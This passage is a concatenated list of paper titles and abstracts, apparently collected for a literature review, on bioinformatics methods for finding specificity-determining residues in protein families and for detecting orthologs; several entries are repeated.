specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: BADASP: predicting functional specificity in protein families using ancestral sequences paper_content: Summary: Burst After Duplication with Ancestral Sequence Predictions (BADASP) is a software package for identifying sites that may confer subfamily-specific biological functions in protein families following functional divergence of duplicated proteins. A given protein phylogeny is grouped into subfamilies based on orthology/paralogy relationships and/or user definitions. Ancestral sequences are then predicted from the sequence alignment and the functional specificity is calculated using variants of the Burst After Duplication method, which tests for radical amino acid substitutions following gene duplications that are subsequently conserved. Statistics are output along with subfamily groupings and ancestral sequences for an easy analysis with other packages. ::: ::: Availability: BADASP is freely available from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ ::: ::: Contact: [email protected] ::: ::: Supplementary information: A manual with further details can be downloaded from http://www.bioinformatics.rcsi.ie/~redwards/badasp/ --- paper_title: Classification of protein families and detection of the determinant residues with an improved self-organizing map paper_content: Using a SOM (self-organizing map) we can classify sequences within a protein family into subgroups that generally correspond to biological subcategories. These maps tend to show sequence similarity as proximity in the map. Combining maps generated at different levels of resolution, the structure of relations in protein families can be captured that could not otherwise be represented in a single map. The underlying representation of maps enables us to retrieve characteristic sequence patterns for individual subgroups of sequences. Such patterns tend to correspond to functionally important regions. We present a modified SOM algorithm that includes a convergence test that dynamically controls the learning parameters to adapt them to the learning set instead of being fixed and externally optimized by trial and error. Given the variability of protein family size and distribution, the addition of this features is necessary. The method is successfully tested with a number of families. The rab family of small GTPases is used to illustrate the performance of the method. --- paper_title: INTREPID: a web server for prediction of functionally important residues by evolutionary analysis paper_content: We present the INTREPID web server for predicting functionally important residues in proteins. INTREPID has been shown to boost the recall and precision of catalytic residue prediction over other sequence-based methods and can be used to identify other types of functional residues. The web server takes an input protein sequence, gathers homologs, constructs a multiple sequence alignment and phylogenetic tree and finally runs the INTREPID method to assign a score to each position. Residues predicted to be functionally important are displayed on homologous 3D structures (where available), highlighting spatial patterns of conservation at various significance thresholds. The INTREPID web server is available at http://phylogenomics.berkeley.edu/intrepid. --- paper_title: Phylogeny-independent detection of functional residues paper_content: Motivation: Current projects for the massive characterization of proteomes are generating protein sequences and structures with unknown function. The difficulty of experimentally determining functionally important sites calls for the development of computational methods. The first techniques, based on the search for fully conserved positions in multiple sequence alignments (MSAs), were followed by methods for locating family-dependent conserved positions. These rely on the functional classification implicit in the alignment for locating these positions related with functional specificity. The next obvious step, still scarcely explored, is to detect these positions using a functional classification different from the one implicit in the sequence relationships between the proteins. Here, we present two new methods for locating functional positions which can incorporate an arbitrary external functional classification which may or may not coincide with the one implicit in the MSA. The Xdet method is able to use a functional classification with an associated hierarchy or similarity between functions to locate positions related to that classification. The MCdet method uses multivariate statistical analysis to locate positions responsible for each one of the functions within a multifunctional family. ::: ::: Results: We applied the methods to different cases, illustrating scenarios where there is a disagreement between the functional and the phylogenetic relationships, and demonstrated their usefulness for the phylogeny-independent prediction of functional positions. ::: ::: Availability: All computer programs and datasets used in this work are available from the authors for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplementary data are available at http://pdg.cnb.uam.es/pazos/Xdet_MCdet_Add/ --- paper_title: The contrasting properties of conservation and correlated phylogeny in protein functional residue prediction paper_content: BackgroundAmino acids responsible for structure, core function or specificity may be inferred from multiple protein sequence alignments where a limited set of residue types are tolerated. The rise in available protein sequences continues to increase the power of techniques based on this principle.ResultsA new algorithm, SMERFS, for predicting protein functional sites from multiple sequences alignments was compared to 14 conservation measures and to the MINER algorithm. Validation was performed on an automatically generated dataset of 1457 families derived from the protein interactions database SNAPPI-DB, and a smaller manually curated set of 148 families. The best performing measure overall was Williamson property entropy, with ROC0.1 scores of 0.0087 and 0.0114 for domain and small molecule contact prediction, respectively. The Lancet method performed worse than random on protein-protein interaction site prediction (ROC0.1 score of 0.0008). The SMERFS algorithm gave similar accuracy to the phylogenetic tree-based MINER algorithm but was superior to Williamson in prediction of non-catalytic transient complex interfaces. SMERFS predicts sites that are significantly more solvent accessible compared to Williamson.ConclusionWilliamson property entropy is the the best performing of 14 conservation measures examined. The difference in performance of SMERFS relative to Williamson in manually defined complexes was dependent on complex type. The best choice of analysis method is therefore dependent on the system of interest. Additional computation employed by Miner in calculation of phylogenetic trees did not produce improved results over SMERFS. SMERFS performance was improved by use of windows over alignment columns, illustrating the necessity of considering the local environment of positions when assessing their functional significance. --- paper_title: Determinants of protein function revealed by combinatorial entropy optimization paper_content: We use a new algorithm (combinatorial entropy optimization [CEO]) to identify specificity residues and functional subfamilies in sets of proteins related by evolution. Specificity residues are conserved within a subfamily but differ between subfamilies, and they typically encode functional diversity. We obtain good agreement between predicted specificity residues and experimentally known functional residues in protein interfaces. Such predicted functional determinants are useful for interpreting the functional consequences of mutations in natural evolution and disease. --- paper_title: Automated ortholog inference from phylogenetic trees and calculation of orthology reliability paper_content: Motivation: Orthologous proteins in different species are likely to have similar biochemical function and biological role. When annotating a newly sequenced genome by sequence homology, the most precise and reliable functional information can thus be derived from orthologs in other species. A standard method of finding orthologs is to compare the sequence tree with the species tree. However, since the topology of phylogenetic tree is not always reliable one might get incorrect assignments. Results: Here we present a novel method that resolves this problem by analyzing a set of bootstrap trees instead of the optimal tree. The frequency of orthology assignments in the bootstrap trees can be interpreted as a support value for the possible orthology of the sequences. Our method is efficient enough to analyze data in the scale of whole genomes. It is implemented in Java and calculates orthology support levels for all pairwise combinations of homologous sequences of two species. The method was tested on simulated datasets and on real data of homologous proteins. Availability: Downloadable free of charge from ftp://ftp. cgb.ki.se/pub/prog/orthostrapper/ or on request from the authors. --- paper_title: Automatic clustering of orthologs and in-paralogs from pairwise species comparisons paper_content: Orthologs are genes in different species that originate from a single gene in the last common ancestor of these species. Such genes have often retained identical biological roles in the present-day organisms. It is hence important to identify orthologs for transferring functional information between genes in different organisms with a high degree of reliability. For example, orthologs of human proteins are often functionally characterized in model organisms. Unfortunately, orthology analysis between human and e.g. invertebrates is often complex because of large numbers of paralogs within protein families. Paralogs that predate the species split, which we call out-paralogs, can easily be confused with true orthologs. Paralogs that arose after the species split, which we call in-paralogs, however, are bona fide orthologs by definition. Orthologs and in-paralogs are typically detected with phylogenetic methods, but these are slow and difficult to automate. Automatic clustering methods based on two-way best genome-wide matches on the other hand, have so far not separated in-paralogs from out-paralogs effectively. We present a fully automatic method for finding orthologs and in-paralogs from two species. Ortholog clusters are seeded with a two-way best pairwise match, after which an algorithm for adding in-paralogs is applied. The method bypasses multiple alignments and phylogenetic trees, which can be slow and error-prone steps in classical ortholog detection. Still, it robustly detects complex orthologous relationships and assigns confidence values for both orthologs and in-paralogs. The program, called INPARANOID, was tested on all completely sequenced eukaryotic genomes. To assess the quality of INPARANOID results, ortholog clusters were generated from a dataset of worm and mammalian transmembrane proteins, and were compared to clusters derived by manual tree-based ortholog detection methods. This study led to the identification with a high degree of confidence of over a dozen novel worm-mammalian ortholog assignments that were previously undetected because of shortcomings of phylogenetic methods.A WWW server that allows searching for orthologs between human and several fully sequenced genomes is installed at http://www.cgb.ki.se/inparanoid/. This is the first comprehensive resource with orthologs of all fully sequenced eukaryotic genomes. Programs and tables of orthology assignments are available from the same location. --- paper_title: Automated hierarchical classification of protein domain subfamilies based on functionally-divergent residue signatures paper_content: BACKGROUND ::: The NCBI Conserved Domain Database (CDD) consists of a collection of multiple sequence alignments of protein domains that are at various stages of being manually curated into evolutionary hierarchies based on conserved and divergent sequence and structural features. These domain models are annotated to provide insights into the relationships between sequence, structure and function via web-based BLAST searches. ::: ::: ::: RESULTS ::: Here we automate the generation of conserved domain (CD) hierarchies using a combination of heuristic and Markov chain Monte Carlo (MCMC) sampling procedures and starting from a (typically very large) multiple sequence alignment. This procedure relies on statistical criteria to define each hierarchy based on the conserved and divergent sequence patterns associated with protein functional-specialization. At the same time this facilitates the sequence and structural annotation of residues that are functionally important. These statistical criteria also provide a means to objectively assess the quality of CD hierarchies, a non-trivial task considering that the protein subgroups are often very distantly related--a situation in which standard phylogenetic methods can be unreliable. Our aim here is to automatically generate (typically sub-optimal) hierarchies that, based on statistical criteria and visual comparisons, are comparable to manually curated hierarchies; this serves as the first step toward the ultimate goal of obtaining optimal hierarchical classifications. A plot of runtimes for the most time-intensive (non-parallelizable) part of the algorithm indicates a nearly linear time complexity so that, even for the extremely large Rossmann fold protein class, results were obtained in about a day. ::: ::: ::: CONCLUSIONS ::: This approach automates the rapid creation of protein domain hierarchies and thus will eliminate one of the most time consuming aspects of conserved domain database curation. At the same time, it also facilitates protein domain annotation by identifying those pattern residues that most distinguish each protein domain subgroup from other related subgroups. --- paper_title: An Introduction to Variable and Feature Selection paper_content: Variable and feature selection have become the focus of much research in areas of application for which datasets with tens or hundreds of thousands of variables are available. These areas include text processing of internet documents, gene expression array analysis, and combinatorial chemistry. The objective of variable selection is three-fold: improving the prediction performance of the predictors, providing faster and more cost-effective predictors, and providing a better understanding of the underlying process that generated the data. The contributions of this special issue cover a wide range of aspects of such problems: providing a better definition of the objective function, feature construction, feature ranking, multivariate feature selection, efficient search methods, and feature validity assessment methods. --- paper_title: Combining specificity determining and conserved residues improves functional site prediction paper_content: BackgroundPredicting the location of functionally important sites from protein sequence and/or structure is a long-standing problem in computational biology. Most current approaches make use of sequence conservation, assuming that amino acid residues conserved within a protein family are most likely to be functionally important. Most often these approaches do not consider many residues that act to define specific sub-functions within a family, or they make no distinction between residues important for function and those more relevant for maintaining structure (e.g. in the hydrophobic core). Many protein families bind and/or act on a variety of ligands, meaning that conserved residues often only bind a common ligand sub-structure or perform general catalytic activities.ResultsHere we present a novel method for functional site prediction based on identification of conserved positions, as well as those responsible for determining ligand specificity. We define Specificity-Determining Positions (SDPs), as those occupied by conserved residues within sub-groups of proteins in a family having a common specificity, but differ between groups, and are thus likely to account for specific recognition events. We benchmark the approach on enzyme families of known 3D structure with bound substrates, and find that in nearly all families residues predicted by SDPsite are in contact with the bound substrate, and that the addition of SDPs significantly improves functional site prediction accuracy. We apply SDPsite to various families of proteins containing known three-dimensional structures, but lacking clear functional annotations, and discusse several illustrative examples.ConclusionThe results suggest a better means to predict functional details for the thousands of protein structures determined prior to a clear understanding of molecular function. --- paper_title: Sequence comparison by sequence harmony identifies subtype-specific functional sites paper_content: Multiple sequence alignments are often used to reveal functionally important residues within a protein family. They can be particularly useful for the identification of key residues that determine functional differences between protein subfamilies. We present a new entropy-based method, Sequence Harmony (SH) that accurately detects subfamily-specific positions from a multiple sequence alignment. The SH algorithm implements a novel formula, able to score compositional differences between subfamilies, without imposing conservation, in a simple manner on an intuitive scale. We compare our method with the most important published methods, i.e. AMAS, TreeDet and SDP-pred, using three well-studied protein families: the receptor-binding domain (MH2) of the Smad family of transcription factors, the Ras-superfamily of small GTPases and the MIP-family of integral membrane transporters. We demonstrate that SH accurately selects known functional sites with higher coverage than the other methods for these test-cases. This shows that compositional differences between protein subfamilies provide sufficient basis for identification of functional sites. In addition, SH selects a number of sites of unknown function that could be interesting candidates for further experimental investigation. --- paper_title: SDPpred: a tool for prediction of amino acid residues that determine differences in functional specificity of homologous proteins. paper_content: SDPpred (Specificity Determining Position prediction) is a tool for prediction of residues in protein sequences that determine the proteins' functional specificity. It is designed for analysis of protein families whose members have biochemically similar but not identical interaction partners (e.g. different substrates for a family of transporters). SDPpred predicts residues that could be responsible for the proteins' choice of their correct interaction partners. The input of SDPpred is a multiple alignment of a protein family divided into a number of specificity groups, within which the interaction partner is believed to be the same. SDPpred does not require information about the secondary or three-dimensional structure of proteins. It produces a set of the alignment positions (specificity determining positions) that determine differences in functional specificity. SDPpred is available at http://math.genebee.msu.ru/~psn/. --- paper_title: In silico discovery of enzyme-substrate specificity-determining residue clusters. paper_content: The binding between an enzyme and its substrate is highly specific, despite the fact that many different enzymes show significant sequence and structure similarity. There must be, then, substrate specificity-determining residues that enable different enzymes to recognize their unique substrates. We reason that a coordinated, not independent, action of both conserved and non-conserved residues determine enzymatic activity and specificity. Here, we present a surface patch ranking (SPR) method for in silico discovery of substrate specificity-determining residue clusters by exploring both sequence conservation and correlated mutations. As case studies we apply SPR to several highly homologous enzymatic protein pairs, such as guanylyl versus adenylyl cyclases, lactate versus malate dehydrogenases, and trypsin versus chymotrypsin. Without using experimental data, we predict several single and multi-residue clusters that are consistent with previous mutagenesis experimental results. Most single-residue clusters are directly involved in enzyme–substrate interactions, whereas multi-residue clusters are vital for domain–domain and regulator–enzyme interactions, indicating their complementary role in specificity determination. These results demonstrate that SPR may help the selection of target residues for mutagenesis experiments and, thus, focus rational drug design, protein engineering, and functional annotation to the relevant regions of a protein. --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Using evolutionary information to find specificity-determining and co-evolving residues. paper_content: Intricate networks of protein interactions rely on the ability of a protein to recognize its targets: other proteins, ligands, and sites on DNA and RNA. To recognize other molecules, it was suggested that a protein uses a small set of specificity-determining residues (SDRs). How can one find these residues in proteins and distinguish them from other functionally important amino acids? A number of bioinformatics methods to predict SDRs have been developed in recent years. These methods use genomic information and multiple sequence alignments to identify positions exhibiting a specific pattern of conservation and variability. The challenge is to delineate the evolutionary pattern of SDRs from that of the active site residues and the residues responsible for formation of the protein's structure. The phylogenetic history of a protein family makes such analysis particularly hard. Here we present two methods for finding the SDRs and the co-evolving residues (CERs) in proteins. We use a Monte Carlo approach for statistical inference, allowing us to reveal specific evolutionary patterns of SDRs and CERs. We apply these methods to study specific recognition in the bacterial two-component system and in the class Ia aminoacyl-tRNA synthetases. Our results agree well with structural information and the experimental analyses of these systems. Our results point at the complex and distinct patterns characteristic of the evolution of specificity in these systems. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: Sequence analysis Multi-RELIEF : a method to recognize specificity determining residues from multiple sequence alignments using a Machine-Learning approach for feature weighting paper_content: Motivation: Identification of residues that account for protein function specificity is crucial, not only for understanding the nature of functional specificity, but also for protein engineering experiments aimed at switching the specificity of an enzyme, regulator or transporter. Available algorithms generally use multiple sequence alignments to identify residue positions conserved within subfamilies but divergent in between. However, many biological examples show a much subtler picture than simple intra-group conservation versus inter-group divergence. ::: ::: Results: We present multi-RELIEF, a novel approach for identifying specificity residues that is based on RELIEF, a state-of-the-art Machine-Learning technique for feature weighting. It estimates the expected ‘local’ functional specificity of residues from an alignment divided in multiple classes. Optionally, 3D structure information is exploited by increasing the weight of residues that have high-weight neighbors. Using ROC curves over a large body of experimental reference data, we show that (a) multi-RELIEF identifies specificity residues for the seven test sets used, (b) incorporating structural information improves prediction for specificity of interaction with small molecules and (c) comparison of multi-RELIEF with four other state-of-the-art algorithms indicates its robustness and best overall performance. ::: ::: Availability: A web-server implementation of multi-RELIEF is available at www.ibi.vu.nl/programs/multirelief. Matlab source code of the algorithm and data sets are available on request for academic use. ::: ::: Contact: [email protected] ::: ::: Supplementary information: Supplemenmtary data are available at Bioinformatics online --- paper_title: Multi-Harmony: detecting functional specificity from sequence alignment paper_content: Many protein families contain sub-families with functional specialization, such as binding different ligands or being involved in different protein-protein interactions. A small number of amino acids generally determine functional specificity. The identification of these residues can aid the understanding of protein function and help finding targets for experimental analysis. Here, we present multi-Harmony, an interactive web sever for detecting sub-type-specific sites in proteins starting from a multiple sequence alignment. Combining our Sequence Harmony (SH) and multi-Relief (mR) methods in one web server allows simultaneous analysis and comparison of specificity residues; furthermore, both methods have been significantly improved and extended. SH has been extended to cope with more than two sub-groups. mR has been changed from a sampling implementation to a deterministic one, making it more consistent and user friendly. For both methods Z-scores are reported. The multi-Harmony web server produces a dynamic output page, which includes interactive connections to the Jalview and Jmol applets, thereby allowing interactive analysis of the results. Multi-Harmony is available at http://www.ibi.vu.nl/ programs/shmrwww. --- paper_title: Automated ortholog inference from phylogenetic trees and calculation of orthology reliability paper_content: Motivation: Orthologous proteins in different species are likely to have similar biochemical function and biological role. When annotating a newly sequenced genome by sequence homology, the most precise and reliable functional information can thus be derived from orthologs in other species. A standard method of finding orthologs is to compare the sequence tree with the species tree. However, since the topology of phylogenetic tree is not always reliable one might get incorrect assignments. Results: Here we present a novel method that resolves this problem by analyzing a set of bootstrap trees instead of the optimal tree. The frequency of orthology assignments in the bootstrap trees can be interpreted as a support value for the possible orthology of the sequences. Our method is efficient enough to analyze data in the scale of whole genomes. It is implemented in Java and calculates orthology support levels for all pairwise combinations of homologous sequences of two species. The method was tested on simulated datasets and on real data of homologous proteins. Availability: Downloadable free of charge from ftp://ftp. cgb.ki.se/pub/prog/orthostrapper/ or on request from the authors. --- paper_title: Combining specificity determining and conserved residues improves functional site prediction paper_content: BackgroundPredicting the location of functionally important sites from protein sequence and/or structure is a long-standing problem in computational biology. Most current approaches make use of sequence conservation, assuming that amino acid residues conserved within a protein family are most likely to be functionally important. Most often these approaches do not consider many residues that act to define specific sub-functions within a family, or they make no distinction between residues important for function and those more relevant for maintaining structure (e.g. in the hydrophobic core). Many protein families bind and/or act on a variety of ligands, meaning that conserved residues often only bind a common ligand sub-structure or perform general catalytic activities.ResultsHere we present a novel method for functional site prediction based on identification of conserved positions, as well as those responsible for determining ligand specificity. We define Specificity-Determining Positions (SDPs), as those occupied by conserved residues within sub-groups of proteins in a family having a common specificity, but differ between groups, and are thus likely to account for specific recognition events. We benchmark the approach on enzyme families of known 3D structure with bound substrates, and find that in nearly all families residues predicted by SDPsite are in contact with the bound substrate, and that the addition of SDPs significantly improves functional site prediction accuracy. We apply SDPsite to various families of proteins containing known three-dimensional structures, but lacking clear functional annotations, and discusse several illustrative examples.ConclusionThe results suggest a better means to predict functional details for the thousands of protein structures determined prior to a clear understanding of molecular function. --- paper_title: Prediction of functional specificity determinants from protein sequences using log-likelihood ratios paper_content: Motivation: A number of methods have been developed to predict functional specificity determinants in protein families based on sequence information. Most of these methods rely on pre-defined functional subgroups. Manual subgroup definition is difficult because of the limited number of experimentally characterized subfamilies with differing specificity, while automatic subgroup partitioning using computational tools is a non-trivial task and does not always yield ideal results. ::: ::: Results: We propose a new approach SPEL (specificity positions by evolutionary likelihood) to detect positions that are likely to be functional specificity determinants. SPEL, which does not require subgroup definition, takes a multiple sequence alignment of a protein family as the only input, and assigns a P-value to every position in the alignment. Positions with low P-values are likely to be important for functional specificity. An evolutionary tree is reconstructed during the calculation, and P-value estimation is based on a random model that involves evolutionary simulations. Evolutionary log-likelihood is chosen as a measure of amino acid distribution at a position. To illustrate the performance of the method, we carried out a detailed analysis of two protein families (LacI/PurR and G protein α subunit), and compared our method with two existing methods (evolutionary trace and mutual information based). All three methods were also compared on a set of protein families with known ligand-bound structures. ::: ::: Availability: SPEL is freely available for non-commercial use. Its pre-compiled versions for several platforms and alignments used in this work are available at ftp://iole.swmed.edu/pub/SPEL/ ::: ::: Contact:[email protected]. ::: ::: Supplementary information: Supplementary materials are available at ftp:/iole.swmed.edu/pub/SPEL/ --- paper_title: SPEER-SERVER: a web server for prediction of protein specificity determining sites paper_content: Sites that show specific conservation patterns within subsets of proteins in a protein family are likely to be involved in the development of functional specificity. These sites, generally termed specificity determining sites (SDS), might play a crucial role in binding to a specific substrate or proteins. Identification of SDS through experimental techniques is a slow, difficult and tedious job. Hence, it is very important to develop efficient computational methods that can more expediently identify SDS. Herein, we present Specificity prediction using amino acids’ Properties, Entropy and Evolution Rate (SPEER)-SERVER, a web server that predicts SDS by analyzing quantitative measures of the conservation patterns of protein sites based on their physico-chemical properties and the heterogeneity of evolutionary changes between and within the protein subfamilies. This web server provides an improved representation of results, adds useful input and output options and integrates a wide range of analysis and data visualization tools when compared with the original standalone version of the SPEER algorithm. Extensive benchmarking finds that SPEER-SERVER exhibits sensitivity and precision performance that, on average, meets or exceeds that of other currently available methods. SPEER-SERVER is available at http://www.hpppi.iicb.res.in/ss/. --- paper_title: Ensemble approach to predict specificity determinants: benchmarking and validation paper_content: BackgroundIt is extremely important and challenging to identify the sites that are responsible for functional specification or diversification in protein families. In this study, a rigorous comparative benchmarking protocol was employed to provide a reliable evaluation of methods which predict the specificity determining sites. Subsequently, three best performing methods were applied to identify new potential specificity determining sites through ensemble approach and common agreement of their prediction results.ResultsIt was shown that the analysis of structural characteristics of predicted specificity determining sites might provide the means to validate their prediction accuracy. For example, we found that for smaller distances it holds true that the more reliable the prediction method is, the closer predicted specificity determining sites are to each other and to the ligand.ConclusionWe observed certain similarities of structural features between predicted and actual subsites which might point to their functional relevance. We speculate that majority of the identified potential specificity determining sites might be indirectly involved in specific interactions and could be ideal target for mutagenesis experiments. --- paper_title: Bayesian search of functionally divergent protein subgroups and their function specific residues paper_content: Motivation: The rapid increase in the amount of protein sequence data has created a need for an automated identification of evolutionarily related subgroups from large datasets. The existing methods typically require a priori specification of the number of putative groups, which defines the resolution of the classification solution. ::: ::: Results: We introduce a Bayesian model-based approach to simultaneous identification of evolutionary groups and conserved parts of the protein sequences. The model-based approach provides an intuitive and efficient way of determining the number of groups from the sequence data, in contrast to the ad hoc methods often exploited for similar purposes. Our model recognizes the areas in the sequences that are relevant for the clustering and regards other areas as noise. We have implemented the method using a fast stochastic optimization algorithm which yields a clustering associated with the estimated maximum posterior probability. The method has been shown to have high specificity and sensitivity in simulated and real clustering tasks. With real datasets the method also highlights the residues close to the active site. ::: ::: Availability: Software 'kPax' is available at http://www.rni.helsinki.fi/jic/softa.html ::: ::: Contact: [email protected] ::: ::: Supplementary information: http://www.rni.helsinki.fi/~jic/softa.html --- paper_title: Predicting functional divergence in protein evolution by site-specific rate shifts. paper_content: Most modern tools that analyze protein evolution allow individual sites to mutate at constant rates over the history of the protein family. However, Walter Fitch observed in the 1970s that, if a protein changes its function, the mutability of individual sites might also change. This observation is captured in the "non-homogeneous gamma model", which extracts functional information from gene families by examining the different rates at which individual sites evolve. This model has recently been coupled with structural and molecular biology to identify sites that are likely to be involved in changing function within the gene family. Applying this to multiple gene families highlights the widespread divergence of functional behavior among proteins to generate paralogs and orthologs. --- paper_title: OrthoMCL: identification of ortholog groups for eukaryotic genomes. paper_content: The identification of orthologous groups is useful for genome annotation, studies on gene/protein evolution, comparative genomics, and the identification of taxonomically restricted sequences. Methods successfully exploited for prokaryotic genome analysis have proved difficult to apply to eukaryotes, however, as larger genomes may contain multiple paralogous genes, and sequence information is often incomplete. OrthoMCL provides a scalable method for constructing orthologous groups across multiple eukaryotic taxa, using a Markov Cluster algorithm to group (putative) orthologs and paralogs. This method performs similarly to the INPARANOID algorithm when applied to two genomes, but can be extended to cluster orthologs from multiple species. OrthoMCL clusters are coherent with groups identified by EGO, but improved recognition of "recent" paralogs permits overlapping EGO groups representing the same gene to be merged. Comparison with previously assigned EC annotations suggests a high degree of reliability, implying utility for automated eukaryotic genome annotation. OrthoMCL has been applied to the proteome data set from seven publicly available genomes (human, fly, worm, yeast, Arabidopsis, the malaria parasite Plasmodium falciparum, and Escherichia coli). A Web interface allows queries based on individual genes or user-defined phylogenetic patterns (http://www.cbil.upenn.edu/gene-family). Analysis of clusters incorporating P. falciparum genes identifies numerous enzymes that were incompletely annotated in first-pass annotation of the parasite genome. --- paper_title: Functional specificity lies within the properties and evolutionary changes of amino acids. paper_content: The rapid increase in the amount of protein sequence data has created a need for automated identification of sites that determine functional specificity among related subfamilies of proteins. A significant fraction of subfamily specific sites are only marginally conserved, which makes it extremely challenging to detect those amino acid changes that lead to functional diversification. To address this critical problem we developed a method named SPEER (specificity prediction using amino acids' properties, entropy and evolution rate) to distinguish specificity determining sites from others. SPEER encodes the conservation patterns of amino acid types using their physico-chemical properties and the heterogeneity of evolutionary changes between and within the subfamilies. To test the method, we compiled a test set containing 13 protein families with known specificity determining sites. Extensive benchmarking by comparing the performance of SPEER with other specificity site prediction algorithms has shown that it performs better in predicting several categories of subfamily specific sites. --- paper_title: RIO: Analyzing proteomes by automated phylogenomics using resampled inference of orthologs paper_content: BACKGROUND ::: When analyzing protein sequences using sequence similarity searches, orthologous sequences (that diverged by speciation) are more reliable predictors of a new protein's function than paralogous sequences (that diverged by gene duplication). The utility of phylogenetic information in high-throughput genome annotation ("phylogenomics") is widely recognized, but existing approaches are either manual or not explicitly based on phylogenetic trees. ::: ::: ::: RESULTS ::: Here we present RIO (Resampled Inference of Orthologs), a procedure for automated phylogenomics using explicit phylogenetic inference. RIO analyses are performed over bootstrap resampled phylogenetic trees to estimate the reliability of orthology assignments. We also introduce supplementary concepts that are helpful for functional inference. RIO has been implemented as Perl pipeline connecting several C and Java programs. It is available at http://www.genetics.wustl.edu/eddy/forester/. A web server is at http://www.rio.wustl.edu/. RIO was tested on the Arabidopsis thaliana and Caenorhabditis elegans proteomes. ::: ::: ::: CONCLUSION ::: The RIO procedure is particularly useful for the automated detection of first representatives of novel protein subfamilies. We also describe how some orthologies can be misleading for functional inference. --- paper_title: Automated Protein Subfamily Identification and Classification paper_content: Function prediction by homology is widely used to provide preliminary functional annotations for genes for which experimental evidence of function is unavailable or limited. This approach has been shown to be prone to systematic error, including percolation of annotation errors through sequence databases. Phylogenomic analysis avoids these errors in function prediction but has been difficult to automate for high-throughput application. To address this limitation, we present a computationally efficient pipeline for phylogenomic classification of proteins. This pipeline uses the SCI-PHY (Subfamily Classification in Phylogenomics) algorithm for automatic subfamily identification, followed by subfamily hidden Markov model (HMM) construction. A simple and computationally efficient scoring scheme using family and subfamily HMMs enables classification of novel sequences to protein families and subfamilies. Sequences representing entirely novel subfamilies are differentiated from those that can be classified to subfamilies in the input training set using logistic regression. Subfamily HMM parameters are estimated using an information-sharing protocol, enabling subfamilies containing even a single sequence to benefit from conservation patterns defining the family as a whole or in related subfamilies. SCI-PHY subfamilies correspond closely to functional subtypes defined by experts and to conserved clades found by phylogenetic analysis. Extensive comparisons of subfamily and family HMM performances show that subfamily HMMs dramatically improve the separation between homologous and non-homologous proteins in sequence database searches. Subfamily HMMs also provide extremely high specificity of classification and can be used to predict entirely novel subtypes. The SCI-PHY Web server at http://phylogenomics.berkeley.edu/SCI-PHY/ allows users to upload a multiple sequence alignment for subfamily identification and subfamily HMM construction. Biologists wishing to provide their own subfamily definitions can do so. Source code is available on the Web page. The Berkeley Phylogenomics Group PhyloFacts resource contains pre-calculated subfamily predictions and subfamily HMMs for more than 40,000 protein families and domains at http://phylogenomics.berkeley.edu/phylofacts/. --- paper_title: Clustering of proximal sequence space for the identification of protein families paper_content: Motivation: The study of sequence space, and the deciphering of the structure of protein families and subfamilies, has up to now been required for work in comparative genomics and for the prediction of protein function. With the emergence of structural proteomics projects, it is becoming increasingly important to be able to select protein targets for structural studies that will appropriately cover the space of protein sequences, functions and genomic distribution. These problems are the motivation for the development of methods for clustering protein sequences and building families of potentially orthologous sequences, such as those proposed here. Results: First we developed a clustering strategy (Ncut algorithm) capable of forming groups of related sequences by assessing their pairwise relationships. The results presented for the ras super-family of proteins are similar to those produced by other clustering methods, but without the need for clustering the full sequence space. The Ncut clusters are then used as the input to a process of reconstruction of groups with equilibrated genomic composition formed by closely-related sequences. The results of applying this technique to the data set used in the construction of the COG database are very similar to those derived by the human experts responsible for 